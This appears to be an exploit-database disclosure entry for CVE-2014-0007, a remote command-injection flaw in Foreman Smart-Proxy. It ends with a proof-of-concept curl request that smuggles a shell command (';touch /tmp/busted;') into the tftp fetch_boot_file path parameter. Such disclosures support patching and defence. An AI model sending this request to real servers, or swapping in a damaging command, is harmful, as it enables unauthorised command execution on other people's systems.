Foreman Smart-Proxy - Remote Command Injection
Author: Lukas Zapletal
type: remote
platform: multiple
port:
date_added: 2014-06-05
date_updated: 2016-01-11
verified: 1
codes: CVE-2014-0007;OSVDB-108277
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/68117/info
Foreman is prone to a remote command-injection vulnerability.
Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy.
curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'